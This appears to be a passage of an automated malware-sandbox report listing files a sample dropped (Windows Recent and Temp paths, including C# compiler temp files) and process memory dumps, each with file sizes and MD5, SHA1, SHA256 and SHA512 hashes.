5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
cb1f71dbd6127c10ae1853affc0b8685

SHA1
b551e34175b1d6f02b9b71c0c42ca1edcfb981e9

SHA256
b62c6df6c36f3fe4e9dade4bc60b87c26094f5f004af3742905672b606ed5d61

SHA512
f0cbbdd88af6a3ba7f86aee2ecb7a43d14d1e514772df7e0a150726a9f41d164e5a88287cf501473ebf3fbadb2db68b0aac2cf6cc905480a86964311279a5b85

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
f1fc0e265c9e8bd644f64a8a83fa12b4

SHA1
7bfff7d7e1ae8e081a3ed41d52d644603cc2d619

SHA256
9e4386fbd68af5f85c79d37ed5b7a0c8db7d03366e929aec70a58b0b37f1039f

SHA512
3a337870cb4437f69df2e0651c96be427759ceecf984a9fdafcdaf5ff40ce7bdf0cec9746f637d4ac125878e4500d5ea3c3197e7e74b7a8ed8c1d13c12a1893f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0dhtcnew\0dhtcnew.0.cs

Filesize
268B

MD5
7fbb3f2ac5a0040e7e42f8fc7cd6fbfe

SHA1
93fcde99bba753677f8786fbcdba4d695296bd12

SHA256
d3f7e6731d46ba381595954053ae69cf2cc2fa91c2a27ed8ed5154bebcd0f5d2

SHA512
3fe646607615f671d2aa1470a4c7ac0c55a463b56c210a8e1658a8961d2ff453647c7517cf4abed47f6d6f9679f9f67e08e02bf0515410fddd64545d3c4145f8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0dhtcnew\0dhtcnew.cmdline

Filesize
369B

MD5
e125cd60cb8eab5f1a6b7127373b492d

SHA1
aaf353f7883d0911c471bbfb58602f768e148ad7

SHA256
22064ce97bb5f1df2ab3843b4d64e7173292003af6b2cfa0be0eab07c2bf83c3

SHA512
1624d0197e551fede0c9162c93e3c7815cf120451035806f636413ac8f6acb94bdecaf4affee9e1e75577f138eb3b93e7af44fb66d88433fc7969b568df3bf22

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0dhtcnew\CSCD340002034294010A5BAD7C7797E58A7.TMP

Filesize
652B

MD5
d7f72915acb58a96fbebaf674c0fcaf3

SHA1
603e97ce37ca25578b41a378db2c2e861f490078

SHA256
1cb68dc17bcf6b81d186469a5b6a907e93ce1e014df6c82593e52a1786677e57

SHA512
2058dbdceb2ad0db77aae4260bb510ab5a42e2d51c39a478969380e30c65676dbe03f2aee4a1dd65bc9e69ae47d4863f8a952f8c72e2284b0d5229b92a70bc02

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3rv3utvl\3rv3utvl.cmdline

Filesize
369B

MD5
851f809750f61262e20b3de9bbddcf21

SHA1
5c834f1e58ef9df8babad87384a73240355a32a3

SHA256
f05233be6a800babb75937a9503d18b2a05fe22564beb9151e27df4e85e39e83

SHA512
51728829ad8f178a217c46a872fe6232cde2dc7b12be8407fbf401b5419087e15621c8098156bbe30a2aa37acd37012cf60da6af2649d56b552b17e7d205280f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\3rv3utvl\CSCE80CF968D5D24534B3CBD8FF7FE4195.TMP

Filesize
652B

MD5
b36ed74577dde63204105aa27fc03024

SHA1
d8d802595af8e4427c7764b19da6e7247d9d5b28

SHA256
df80181e1aa642754e7389181f23a143762ad464e44a2a725619ecef1785c24d

SHA512
6db12aa6dae3a324afd76ab16e070a8c4b50601f32382b0529132cf8754053fd77c9cf37557c6e08496832a35dd4b80938a34a29b3c131e6fec4ef691a8beab2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bszhpehx\CSCC5F6FE628C274497B632C75A1BA6F61.TMP

Filesize
652B

MD5
f4262d593ddba4377576b0686c46ad25

SHA1
14f0f5fd930d96577b6b67ef51a601e01f562549

SHA256
522e3a0070c1b36e7525aae47be8ce0efad8cd2d4c8692bc2544dc8810e21f79

SHA512
41672813519a2c3ff63716757fa9cd7e480dadcb64868caecd4db070aa643dfe54e3efef40ae0f6dbe67aabad67b50b33a5868cb17f32ce00bd2633de083ca68

Download Submit
memory/380-10-0x0000020CE0B40000-0x0000020CE0B62000-memory.dmp

Filesize
136KB

Download
memory/380-15-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

Filesize
10.8MB

Download
memory/380-0-0x00007FFB476E3000-0x00007FFB476E5000-memory.dmp

Filesize
8KB

Download
memory/380-11-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

Filesize
10.8MB

Download
memory/380-12-0x00007FFB476E0000-0x00007FFB481A1000-memory.dmp

Filesize
10.8MB

Download
memory/1444-75-0x000001E71AB00000-0x000001E71AB08000-memory.dmp

Filesize
32KB

Download
memory/2316-133-0x0000021716A40000-0x0000021716A48000-memory.dmp

Filesize
32KB

Download
memory/3940-51-0x0000019CADCA0000-0x0000019CADD16000-memory.dmp

Filesize
472KB

Download
memory/3940-50-0x0000019CAD870000-0x0000019CAD8B4000-memory.dmp

Filesize
272KB

Download
memory/4816-140-0x0000000000A00000-0x0000000000A0E000-memory.dmp

Filesize
56KB

Download